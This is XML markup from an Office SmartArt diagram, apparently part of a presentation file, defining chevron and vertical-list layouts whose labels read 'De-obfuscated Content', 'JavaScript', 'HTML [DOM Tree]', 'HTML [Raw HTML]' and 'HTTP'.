    <dgm:cxn modelId="{EAF31A2A-2D6A-451A-983E-5386B5F03E4B}" srcId="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" destId="{34813B92-B213-415E-B5C9-DB13417B2854}" srcOrd="0" destOrd="0" parTransId="{07A78073-0F7B-452A-9100-2A2EDF132F3F}" sibTransId="{818729F1-3367-4EAE-8C72-2048B8D12C37}"/>
    <dgm:cxn modelId="{8D773734-0BA5-4F97-B165-9662A1D22620}" srcId="{C76432A3-662A-436B-8E3F-938766070666}" destId="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" srcOrd="2" destOrd="0" parTransId="{90129D6F-9F02-4F6E-96C5-8C065DC74959}" sibTransId="{754D15AD-F63B-4143-AEA9-6B529F2438D7}"/>
    <dgm:cxn modelId="{EBDC3D3F-FE0E-4600-BECB-B03A4CB6A610}" type="presOf" srcId="{3EAE7E36-47EC-477E-A5C0-6946D10F0B5A}" destId="{193A4E96-EA76-455A-B306-097368F63BAF}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{F06F9A48-8250-41AA-89E3-3D2D4FECC27F}" type="presOf" srcId="{BF43BED3-9958-4CC3-96BB-ED983618227A}" destId="{193A4E96-EA76-455A-B306-097368F63BAF}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{B068F758-E1B5-45A1-8D47-ED2FE2333573}" srcId="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" destId="{ED8ABDD1-B1F8-48F7-A38C-A30AECEC3A6B}" srcOrd="0" destOrd="0" parTransId="{8B6ABEF0-C3B2-4502-91EC-8C32CB70267D}" sibTransId="{C8567AEB-DD25-4441-8FB3-0798370907ED}"/>
    <dgm:cxn modelId="{FDE16B63-D568-4A30-897A-94FAA6326338}" type="presOf" srcId="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" destId="{E71B10DC-9D54-4B80-8C10-A7DD07308FE1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A9D0A26F-2F62-42F2-92AA-99B6FA6DD4E3}" type="presOf" srcId="{B84D3E8B-D501-48C0-90A7-FA99253F8B0C}" destId="{229336F8-42EF-412A-B5A9-511619FAC596}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{8C32C66F-7CC2-44B5-AD0C-10E70B227CDC}" type="presOf" srcId="{C76432A3-662A-436B-8E3F-938766070666}" destId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{CD485487-2726-4D7A-8661-BCCF40772BFC}" srcId="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" destId="{279B291C-FEFB-476B-AD70-D193F75E62F0}" srcOrd="2" destOrd="0" parTransId="{1057219D-2923-4A41-B1C8-9215F9DBADE8}" sibTransId="{8BDFAF9A-4791-4DAD-970F-A956A7380DC5}"/>
    <dgm:cxn modelId="{EC298095-A243-4F5F-AA1D-49773C4E08E6}" type="presOf" srcId="{34813B92-B213-415E-B5C9-DB13417B2854}" destId="{E71B10DC-9D54-4B80-8C10-A7DD07308FE1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{E4C86698-17D7-4F1E-AD3F-73AE33F701C6}" srcId="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" destId="{6F12C081-47FF-4672-AF6A-D94963EAB28D}" srcOrd="1" destOrd="0" parTransId="{73AB9A30-AB93-48E9-A3B3-63D4A168578E}" sibTransId="{6785A023-168F-442B-A66D-912D22E38037}"/>
    <dgm:cxn modelId="{511AD79A-7DD2-490A-9158-80787AC46B8A}" srcId="{C76432A3-662A-436B-8E3F-938766070666}" destId="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" srcOrd="3" destOrd="0" parTransId="{85BB9825-673A-467B-9B35-D42142C80342}" sibTransId="{78D05F0F-E434-4B02-956C-D14E36F06E62}"/>
    <dgm:cxn modelId="{5578F0B0-3D64-4AB3-AC93-FF239332FB67}" srcId="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" destId="{6683F241-EAAC-4B1A-ADEF-408EA235692A}" srcOrd="2" destOrd="0" parTransId="{D6A8B4BC-04CE-4980-9065-8CC030E5AA2C}" sibTransId="{389DBCD9-3600-4D27-AC64-5B78D4EBF845}"/>
    <dgm:cxn modelId="{A4A75DB1-E62D-410E-B893-941360D9EDA2}" srcId="{C76432A3-662A-436B-8E3F-938766070666}" destId="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" srcOrd="1" destOrd="0" parTransId="{1D4EADAA-2549-4179-9222-DA1387E2C0B3}" sibTransId="{B23E69CA-790A-46F9-9C96-521C63DEBCA4}"/>
    <dgm:cxn modelId="{9775B1B1-FBA6-417C-AB25-101ADBA1BCFD}" srcId="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" destId="{BF43BED3-9958-4CC3-96BB-ED983618227A}" srcOrd="2" destOrd="0" parTransId="{C8F2376A-251D-41F9-915A-D706E5E40193}" sibTransId="{37A41A5F-6869-45FC-8C59-F6EF7BC90582}"/>
    <dgm:cxn modelId="{3CCDD9B1-3A1E-48EA-A3A9-BD7249B3AE71}" srcId="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" destId="{E66F6F85-A9D3-4151-8E48-19AA54CF3AF9}" srcOrd="2" destOrd="0" parTransId="{3425E773-7A8C-408E-9E31-C1509998BE46}" sibTransId="{7FB16E82-4D60-4968-8C3F-0444FDB6FA51}"/>
    <dgm:cxn modelId="{42B80FB3-4411-480B-B97D-BFFA722108FF}" srcId="{C76432A3-662A-436B-8E3F-938766070666}" destId="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" srcOrd="0" destOrd="0" parTransId="{C98EF444-B37C-4C61-8EC0-9FE8EF8D647E}" sibTransId="{293180DD-922A-48AF-9B13-0EFD6E3F6D0C}"/>
    <dgm:cxn modelId="{8F863AB3-5D79-4D2F-9D20-08E990E98FFB}" srcId="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" destId="{DE25965B-ADEE-4FCA-AAD2-D4178994713C}" srcOrd="1" destOrd="0" parTransId="{0B4EFA9C-C47E-4C7B-A48B-3FFEE03B34A9}" sibTransId="{3AE4838A-5B01-4C78-8BC9-DAC90E15B77E}"/>
    <dgm:cxn modelId="{919153B5-0C2B-441C-8B65-247239BE3FB2}" srcId="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" destId="{B548609C-DCB9-46E1-AA4D-E6A6F77A6D10}" srcOrd="1" destOrd="0" parTransId="{A58AF34D-85FC-423F-AB8E-5B43FA338B4B}" sibTransId="{74D01219-2FAC-4C7B-A61C-9BAAF3238FDC}"/>
    <dgm:cxn modelId="{ADE3ABB5-E28D-4DAC-9317-764B7A8D0936}" srcId="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" destId="{57DECEC0-0016-41B5-8E76-CD378CAF1352}" srcOrd="1" destOrd="0" parTransId="{0F2BE6A0-7017-476D-97AC-0542EA8EAB62}" sibTransId="{3F5E32CA-A47A-437F-B7F9-D83E173936A0}"/>
    <dgm:cxn modelId="{8E0F2FBD-16F2-4BD6-A6EB-0A5E025F0BF3}" type="presOf" srcId="{57DECEC0-0016-41B5-8E76-CD378CAF1352}" destId="{229336F8-42EF-412A-B5A9-511619FAC596}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{154F76BD-0A84-4217-9EDC-76A362B2D72D}" type="presOf" srcId="{E66F6F85-A9D3-4151-8E48-19AA54CF3AF9}" destId="{03E87BF4-59B7-411F-839E-242C624086A8}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{607565C1-B545-41CA-98C9-D4DEE1AE0D84}" type="presOf" srcId="{6683F241-EAAC-4B1A-ADEF-408EA235692A}" destId="{229336F8-42EF-412A-B5A9-511619FAC596}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7F5599D3-A4DE-4FE8-B0BA-797B05315B81}" type="presOf" srcId="{DE25965B-ADEE-4FCA-AAD2-D4178994713C}" destId="{03E87BF4-59B7-411F-839E-242C624086A8}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5FE539DD-C82B-4F54-ABB4-FF4F4F698962}" type="presOf" srcId="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" destId="{03E87BF4-59B7-411F-839E-242C624086A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{8AB2DCDF-82C1-4ABA-AA30-96ADF724D287}" srcId="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" destId="{3EAE7E36-47EC-477E-A5C0-6946D10F0B5A}" srcOrd="0" destOrd="0" parTransId="{404168EF-632C-43AA-89EB-D320C20F7A30}" sibTransId="{7ACDEF30-B706-4248-A7D8-B2518C03CDD8}"/>
    <dgm:cxn modelId="{1AC660E1-69DC-4473-934C-27406630A028}" type="presOf" srcId="{6F12C081-47FF-4672-AF6A-D94963EAB28D}" destId="{E71B10DC-9D54-4B80-8C10-A7DD07308FE1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{B6AC42EE-4BC6-491C-9F57-A7CB4DC5F413}" type="presOf" srcId="{ED8ABDD1-B1F8-48F7-A38C-A30AECEC3A6B}" destId="{03E87BF4-59B7-411F-839E-242C624086A8}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{9C9254F2-51D4-4B3D-948B-3FF974873921}" type="presOf" srcId="{279B291C-FEFB-476B-AD70-D193F75E62F0}" destId="{E71B10DC-9D54-4B80-8C10-A7DD07308FE1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5E83D7F5-71A5-44D4-B409-F16FF3B87FA2}" srcId="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" destId="{B84D3E8B-D501-48C0-90A7-FA99253F8B0C}" srcOrd="0" destOrd="0" parTransId="{2380E236-AE49-4733-A008-5448130B8DF1}" sibTransId="{F04BF606-A33E-4B54-84E9-C38709EB55A7}"/>
    <dgm:cxn modelId="{BD5FD8B8-73AE-48A3-8D8D-B5280C54E172}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{F71A225B-2645-4DA3-94BB-883C665E585D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0BB6B3EC-43AA-4B3A-B70E-C44E8FAA1EBD}" type="presParOf" srcId="{F71A225B-2645-4DA3-94BB-883C665E585D}" destId="{FA98079A-098B-46C6-8A0D-7B42B3065596}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{967FB0BF-818C-422B-BCA8-6E96C1D190B9}" type="presParOf" srcId="{F71A225B-2645-4DA3-94BB-883C665E585D}" destId="{E71B10DC-9D54-4B80-8C10-A7DD07308FE1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{19F5DBD0-EDA8-43CF-AB01-C832443FA0F0}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{BFC56CBC-DC9D-4422-A585-792181559A67}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{55992652-4261-4A2A-87E9-383CD066CC0B}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{ECCDC805-FBA3-4F79-BE10-0B5D7E743ECD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{299FA96B-BE39-4942-BAF7-1AE896177253}" type="presParOf" srcId="{ECCDC805-FBA3-4F79-BE10-0B5D7E743ECD}" destId="{C5698D94-45B0-497D-B446-AD09A61D641D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{441F5AE8-53FA-4089-89FA-66E6CD88C178}" type="presParOf" srcId="{ECCDC805-FBA3-4F79-BE10-0B5D7E743ECD}" destId="{03E87BF4-59B7-411F-839E-242C624086A8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5C9A7B1E-B981-47CE-879F-FD486227898A}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{9D872353-2F57-4CA8-96B6-C800A08297DA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2A7484D4-2951-4F95-9080-94FD2A980439}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{1F5F19CB-945E-491F-88CF-A23FEA897738}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{3C345218-CCF1-4EFC-92CF-7B6D8B74455C}" type="presParOf" srcId="{1F5F19CB-945E-491F-88CF-A23FEA897738}" destId="{D369FCE2-F72D-4605-88EE-F27139726154}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A9244D7F-766C-45E8-839F-8706608726D0}" type="presParOf" srcId="{1F5F19CB-945E-491F-88CF-A23FEA897738}" destId="{193A4E96-EA76-455A-B306-097368F63BAF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{E7D6F375-B3A7-454B-A720-9C49303516AE}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{3C091CC9-8313-46D6-8010-7996091C5D72}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7AA7FC15-C500-4F8F-8E7C-8CCB25AA7355}" type="presParOf" srcId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" destId="{911C4340-3FDA-40AC-A5AD-31F5495E9224}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{C4C67A66-5147-4885-92DA-6BE61A03072A}" type="presParOf" srcId="{911C4340-3FDA-40AC-A5AD-31F5495E9224}" destId="{2AF053C6-5151-4B84-BEB6-6072A5037075}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{F4915F55-59F1-4A69-A5A6-4DB7EA2D66C6}" type="presParOf" srcId="{911C4340-3FDA-40AC-A5AD-31F5495E9224}" destId="{229336F8-42EF-412A-B5A9-511619FAC59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8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#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AA5807-BF11-473E-97F3-91494E94A21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De-obfuscated Content</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59A73E71-C173-4948-ACF4-2FC69F99962A}" type="parTrans" cxnId="{824C16C2-DEA4-47B7-9751-22E59583704A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C075413-031A-4611-8F1B-878B9A56FDC5}" type="sibTrans" cxnId="{824C16C2-DEA4-47B7-9751-22E59583704A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E83FA6B5-F495-4097-8A1F-B7006267A093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JavaScript</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91D51CCA-6C33-4F62-BB8A-E3A52CC7831C}" type="parTrans" cxnId="{8BBFF144-D6E5-4746-9EF5-149B0C8D2248}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F6FF5A9-3612-42E3-9944-7DCA554F9298}" type="sibTrans" cxnId="{8BBFF144-D6E5-4746-9EF5-149B0C8D2248}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE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HTML [DOM Tree]</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{614399F9-A63C-4E7C-852F-8A2CE918DAA0}" type="parTrans" cxnId="{C4609CC7-4D1E-43D7-91A8-C8F72BA8DD85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3F07C3D-4008-448E-A442-D370EFE81FC1}" type="sibTrans" cxnId="{C4609CC7-4D1E-43D7-91A8-C8F72BA8DD85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420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HTML [Raw HTML]</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B54B2862-D97F-4A29-A6EE-740BAE9BE596}" type="parTrans" cxnId="{1B2E3CFB-5D24-44FC-8D23-90C170D95168}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABAFA4D5-3F72-4684-9A3C-24187B0C57F1}" type="sibTrans" cxnId="{1B2E3CFB-5D24-44FC-8D23-90C170D95168}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92F4D289-7086-474B-A9F4-D725A5A25F3C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HTTP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80844AAD-11A5-4096-9ACB-A5B7594F4BBF}" type="parTrans" cxnId="{48C9DB8B-908D-4BA7-9762-03D63450FF30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30DD3FCD-0C4A-4473-9810-2F11BC1AE229}" type="sibTrans" cxnId="{48C9DB8B-908D-4BA7-9762-03D63450FF30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2290C77-F571-48E0-8EE2-D1B0D872A09D}" type="pres">
      <dgm:prSet presAssocID="{0F8D4BCF-B2FA-4ECE-A84E-B3C0AA14C8F3}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8EB4009E-914B-4E98-ABAC-D26477CDC10A}" type="pres">
      <dgm:prSet presAssocID="{5BAA5807-BF11-473E-97F3-91494E94A21A}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{800B5C39-C726-4DB7-8B93-30D294838425}" type="pres">
      <dgm:prSet presAssocID="{5BAA5807-BF11-473E-97F3-91494E94A21A}" presName="box" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CDD37F9-9142-40F6-8788-02E1863C3184}" type="pres">
      <dgm:prSet presAssocID="{5BAA5807-BF11-473E-97F3-91494E94A21A}" presName="img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D404FAB-A734-4F23-AE22-9C58E47D9BF7}" type="pres">
      <dgm:prSet presAssocID="{5BAA5807-BF11-473E-97F3-91494E94A21A}" presName="text" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{046F4A00-96ED-4BFB-AE6A-7F64A4199B4B}" type="pres">
      <dgm:prSet presAssocID="{0C075413-031A-4611-8F1B-878B9A56FDC5}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0F4917D3-C2A7-4127-9299-087B18FFCD28}" type="pres">
      <dgm:prSet presAssocID="{E83FA6B5-F495-4097-8A1F-B7006267A093}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7E0016F1-9ECF-4DCF-8D49-DEED54E24929}" type="pres">
      <dgm:prSet presAssocID="{E83FA6B5-F495-4097-8A1F-B7006267A093}" presName="box" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4EF98E4F-51A1-4766-B0B9-366C439D3E24}" type="pres">
      <dgm:prSet presAssocID="{E83FA6B5-F495-4097-8A1F-B7006267A093}" presName="img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01B1C51-A108-45A8-838F-75C469B17A01}" type="pres">
      <dgm:prSet presAssocID="{E83FA6B5-F495-4097-8A1F-B7006267A093}" presName="text" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B559AA5-3E92-4C6E-B194-F3579A0974D7}" type="pres">
      <dgm:prSet presAssocID="{7F6FF5A9-3612-42E3-9944-7DCA554F9298}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E4CE5B8-FD49-45EF-848A-38CE57A26F7C}" type="pres">
      <dgm:prSet presAssocID="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C69B6773-B665-4004-B114-232BDB8F894F}" type="pres">
      <dgm:prSet presAssocID="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" presName="box" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E47BA8CB-37A3-45B3-B06C-880C4A651ACF}" type="pres">
      <dgm:prSet presAssocID="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" presName="img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6000" b="-106000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{8EF1B1B1-B114-4BE4-B2AC-6BC708228B80}" type="pres">
      <dgm:prSet presAssocID="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" presName="text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB259E54-8238-4480-A9A7-00537729A580}" type="pres">
      <dgm:prSet presAssocID="{F3F07C3D-4008-448E-A442-D370EFE81FC1}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BDB858C-EC00-49AD-9CCF-81EB09ACD4F3}" type="pres">
      <dgm:prSet presAssocID="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8745CA8-4A6A-4AE4-B0BB-280153E2814D}" type="pres">
      <dgm:prSet presAssocID="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" presName="box" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0C8FEB7-A950-47BC-BA07-39E851073386}" type="pres">
      <dgm:prSet presAssocID="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" presName="img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61398D-B5BA-4E5B-8349-EA74F3C9FB86}" type="pres">
      <dgm:prSet presAssocID="{E8EAB5B2-EE76-482C-80F8-43BBC1C8A420}" presName="text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24545905-E29D-46D9-91B3-96111CF05587}" type="pres">
      <dgm:prSet presAssocID="{ABAFA4D5-3F72-4684-9A3C-24187B0C57F1}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5E40FBC-99CA-46F0-99E5-CC5E6840F91F}" type="pres">
      <dgm:prSet presAssocID="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11AA665D-9500-4B02-9965-60093CCA0F2E}" type="pres">
      <dgm:prSet presAssocID="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" presName="box" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B35B7DFF-CDFB-4296-84BC-B758F90E7C13}" type="pres">
      <dgm:prSet presAssocID="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" presName="img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B91E61F-A442-4AC5-94F0-69915739571C}" type="pres">
      <dgm:prSet presAssocID="{92F4D289-7086-474B-A9F4-D725A5A25F3C}" presName="text" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{DF4B1A01-904F-4888-A004-52BD5556CEB2}" type="presOf" srcId="{5BAA5807-BF11-473E-97F3-91494E94A21A}" destId="{0D404FAB-A734-4F23-AE22-9C58E47D9BF7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{1FA61E03-236D-4560-BB44-A4085B38081C}" type="presOf" srcId="{5BAA5807-BF11-473E-97F3-91494E94A21A}" destId="{800B5C39-C726-4DB7-8B93-30D294838425}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{40151605-BEEF-464B-BBB4-0077B5A7DFD4}" type="presOf" srcId="{9F84937D-7EC0-4AD3-89EC-AFA1242419EE}" destId="{8EF1B1B1-B114-4BE4-B2AC-6BC708228B80}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{97E50E37-6C5D-41BC-9F33-E78CEB2EE1FD}" type="presOf" srcId="{E83FA6B5-F495-4097-8A1F-B7006267A093}" destId="{601B1C51-A108-45A8-838F-75C469B17A01}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
